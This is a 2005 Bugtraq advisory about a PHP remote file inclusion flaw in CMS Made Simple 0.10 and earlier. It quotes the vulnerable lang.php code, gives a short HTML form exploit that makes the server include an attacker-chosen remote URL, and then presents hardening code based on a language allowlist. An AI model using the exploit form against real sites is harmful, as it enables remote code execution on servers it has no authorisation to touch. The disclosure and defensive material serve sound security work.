List: bugtraq
Subject: CMS Made Simple <= 0.10 - PHP injection
From: groszynskif () gmail ! com
Date: 2005-08-31 19:18:04
Message-ID: 20050831191804.11058.qmail () securityfocus ! com
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: CMS Made Simple - PHP injection
Version <= 0.10
Homepage: http://www.cmsmadesimple.org/
Author: Filip Groszynski (VXSfx)
Date: 31 August 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Background:
CMS Made Simple is an easy to use content management
system for simple, stable content sites. It uses PHP, MySQL
and the Smarty templating system.
--------------------------------------------------------
Vulnerable code exists in ./admin/lang.php:
<?php
...
$current_language = "en_US";
#Only do language stuff for admin pages
[!] if (isset($CMS_ADMIN_PAGE)) {
    ...
    #Check to see if there is already a language in use...
    if (isset($_POST["change_cms_lang"])) {
[!]     $current_language = $_POST["change_cms_lang"];
        setcookie("cms_language", $_POST["change_cms_lang"]);
    } else if (isset($_COOKIE["cms_language"])) {
        $current_language = $_COOKIE["cms_language"];
    } else {
        ...
    }
    #Ok, we have a language to load, let's load it already...
    if (isset($nls['file'][$current_language])) {
        foreach ($nls['file'][$current_language] as $onefile) {
[!]         include($onefile);
        }
    }
    ...
}
...
?>
--------------------------------------------------------
Exploit:
example.html:
<form action="http://(__VICTIM__)/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)"
      method=post>
<input type=hidden name=change_cms_lang value=vx>
<input type=submit name=test VALUE="do it">
</form>
EOF
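The listing above has three ingredients that only work together: the $CMS_ADMIN_PAGE gate and the $nls table are plain variables, so with register_globals enabled the query string in the form above can create both; the language code is taken from POST or cookie without being checked; and that code then selects which entry of $nls is passed to include(). The following is an added hardening example, written for this post and not CMS Made Simple's own code or its later fix. It assumes a hypothetical layout lang/<code>/admin.inc.php next to the script and that admin pages define() CMS_ADMIN_PAGE before including it. The table of language files is built locally, the request may only pick one of its keys, and the include path is additionally required to resolve inside lang/.

```php
<?php
// Added hardening example, not CMS Made Simple's own code or fix.
// Assumptions (hypothetical): language files live in lang/<code>/admin.inc.php
// beside this script, and admin pages define CMS_ADMIN_PAGE before including it.

// 1. The language table is a local map built here, never read from a global,
//    so no request parameter (even with register_globals on) can add entries.
$LANGUAGE_FILES = array(
    'en_US' => array(dirname(__FILE__) . '/lang/en_US/admin.inc.php'),
    'pl_PL' => array(dirname(__FILE__) . '/lang/pl_PL/admin.inc.php'),
);

// Returns the language code to use: the POST or cookie value only when it is
// an exact key of the allowlist, otherwise the default. Nothing taken from
// the request is ever used as a path.
function select_language(array $files, array $post, array $cookie, $default = 'en_US')
{
    $candidate = null;
    if (isset($post['change_cms_lang'])) {
        $candidate = $post['change_cms_lang'];
    } elseif (isset($cookie['cms_language'])) {
        $candidate = $cookie['cms_language'];
    }
    if (is_string($candidate) && array_key_exists($candidate, $files)) {
        return $candidate;
    }
    return $default;
}

// Includes the files for an already validated code. As a second check every
// path must resolve to an existing file under lang/, which rejects remote
// URLs and directory traversal even if the table were ever mis-populated.
function load_language_files(array $files, $code)
{
    $base = realpath(dirname(__FILE__) . '/lang');
    foreach ($files[$code] as $onefile) {
        $real = realpath($onefile);
        if ($real === false || $base === false
            || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
            trigger_error("refusing to include language file outside lang/: $onefile",
                          E_USER_WARNING);
            continue;
        }
        include $real;
    }
}

// 2. A constant, not a variable: ?CMS_ADMIN_PAGE=1 can create the variable
//    $CMS_ADMIN_PAGE under register_globals, but it cannot define() a constant.
if (!defined('CMS_ADMIN_PAGE')) {
    return; // included from a non-admin page: no language switching here
}

$current_language = select_language($LANGUAGE_FILES, $_POST, $_COOKIE);

// 3. Only the validated code is persisted in the cookie, never the raw input.
if (isset($_POST['change_cms_lang'])) {
    setcookie('cms_language', $current_language);
}

load_language_files($LANGUAGE_FILES, $current_language);
```

The allowlist is the real fix: a request that sends change_cms_lang=vx, or a cookie carrying any value that is not a key of the table, simply falls back to en_US, and the include() argument is always one of the literal paths written in this file. The realpath() check is belt and braces for the case where the table is later moved into configuration. On a 2005-era deployment the same class of problem is best closed at the server as well, by turning register_globals off.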
--------------------------------------------------------
Contact:
Author: Filip Groszynski (VXSfx)
Location: Poland <Warsaw>
Email: groszynskif <|> gmail <|> com
-- == -- == -- == -- == -- == -- == -- == -- == -- == --